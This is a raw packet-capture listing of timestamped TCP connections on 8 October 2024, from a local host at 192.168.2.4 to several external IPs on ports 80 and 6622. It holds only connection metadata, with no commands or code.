                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.596451998 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.768115997 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773169041 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773243904 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773391962 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.773411989 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.778177023 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.778395891 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.852670908 CEST662249783204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.852780104 CEST497836622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.852874041 CEST497836622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.858198881 CEST662249783204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.933912992 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.935019970 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.935071945 CEST4978980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.937645912 CEST4978980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.943893909 CEST804978913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.052234888 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057080984 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057164907 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057308912 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.057342052 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.062489986 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.063033104 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.138302088 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.139133930 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.139199018 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.141671896 CEST4979080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.146545887 CEST804979047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516211033 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516567945 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516609907 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516683102 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.521624088 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.645809889 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.650851011 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.651046991 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.651283026 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.651297092 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.652014971 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.656230927 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.656634092 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.656924009 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.656976938 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.657304049 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.657334089 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.662415981 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.662429094 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.864203930 CEST498046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.869168043 CEST662249804204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.869237900 CEST498046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.873048067 CEST498046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.878241062 CEST662249804204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.002263069 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.002521992 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.002578974 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.002697945 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.007731915 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.362164021 CEST662249804204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.364010096 CEST498046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.370054007 CEST498046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.374886990 CEST662249804204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.483659983 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.484385967 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.486516953 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.508873940 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.511504889 CEST4981580192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.515881062 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.518079042 CEST8049815172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.519037962 CEST4981580192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.519171953 CEST4981580192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.519207954 CEST4981580192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.525887966 CEST8049815172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.525916100 CEST8049815172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.918025017 CEST4982080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.923556089 CEST804982044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.923652887 CEST4982080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.923901081 CEST4982080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.923935890 CEST4982080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.928940058 CEST804982044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.929311037 CEST804982044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.025664091 CEST8049815172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.025748968 CEST4981580192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.025815964 CEST4981580192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.031028032 CEST8049815172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.046864033 CEST4982180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.051879883 CEST8049821172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.051965952 CEST4982180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.052089930 CEST4982180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.052119970 CEST4982180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.056947947 CEST8049821172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.057017088 CEST8049821172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.380142927 CEST498236622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.385083914 CEST662249823204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.385163069 CEST498236622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.388782024 CEST498236622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.393769026 CEST662249823204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.413654089 CEST804982044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.413975000 CEST804982044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.414047003 CEST4982080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.414153099 CEST4982080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.423584938 CEST804982044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.542376995 CEST8049821172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.542536020 CEST4982180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.542669058 CEST4982180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.547728062 CEST8049821172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.630135059 CEST4982880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.635565996 CEST804982834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.635837078 CEST4982880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.635837078 CEST4982880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.636595964 CEST4982880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.643536091 CEST804982834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.648735046 CEST804982834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.822655916 CEST4982980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.827583075 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.827680111 CEST4982980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.835432053 CEST4982980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.835457087 CEST4982980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.842730045 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.842777967 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.385585070 CEST804982834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.385742903 CEST4982880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.385829926 CEST804982834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.385881901 CEST4982880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.390939951 CEST804982834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.468723059 CEST4983580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.473783016 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.474190950 CEST4983580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.474302053 CEST4983580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.474328995 CEST4983580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.479374886 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.480061054 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.881113052 CEST662249823204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.882900000 CEST498236622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.883039951 CEST498236622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.887759924 CEST662249823204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.952984095 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.953107119 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.953149080 CEST4983580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.953993082 CEST4983580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.960417986 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.013701916 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.018966913 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.019153118 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.019335032 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.019351959 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.024705887 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.024746895 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153393030 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153563023 CEST4982980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153642893 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153692961 CEST4982980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.159100056 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.454770088 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.650996923 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.657902002 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.658293962 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.658457994 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.658483028 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.663532019 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.663548946 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.698288918 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.698338032 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.703685999 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.703768969 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.828318119 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.879395962 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.895454884 CEST498456622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.900505066 CEST662249845204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.900592089 CEST498456622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.905010939 CEST498456622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.909898996 CEST662249845204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.944969893 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.949776888 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.949867010 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.950036049 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.950057030 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.955372095 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.955404043 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.282782078 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.282841921 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.286040068 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.407455921 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.508018017 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.508075953 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.509188890 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.509852886 CEST8049851172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.510133028 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.512016058 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.512027979 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.516850948 CEST8049851172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.517621994 CEST8049851172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.003045082 CEST8049851172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.003114939 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.003168106 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.008109093 CEST8049851172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.276556015 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.276693106 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.276734114 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.276773930 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.281606913 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.380057096 CEST4985780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.380381107 CEST662249845204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.380481958 CEST498456622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.380481958 CEST498456622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.380939960 CEST4985880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.384888887 CEST804985744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.384952068 CEST4985780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.385170937 CEST4985780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.385171890 CEST4985780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.385267973 CEST662249845204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.385775089 CEST804985834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.385842085 CEST4985880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.386012077 CEST4985880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.386035919 CEST4985880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.390424967 CEST804985744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.390455961 CEST804985744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.390984058 CEST804985834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.391444921 CEST804985834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.873085022 CEST804985744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.873255014 CEST4985780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.873574972 CEST804985744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.873622894 CEST4985780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.878210068 CEST804985744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.112143040 CEST4986480192.168.2.454.244.188.177
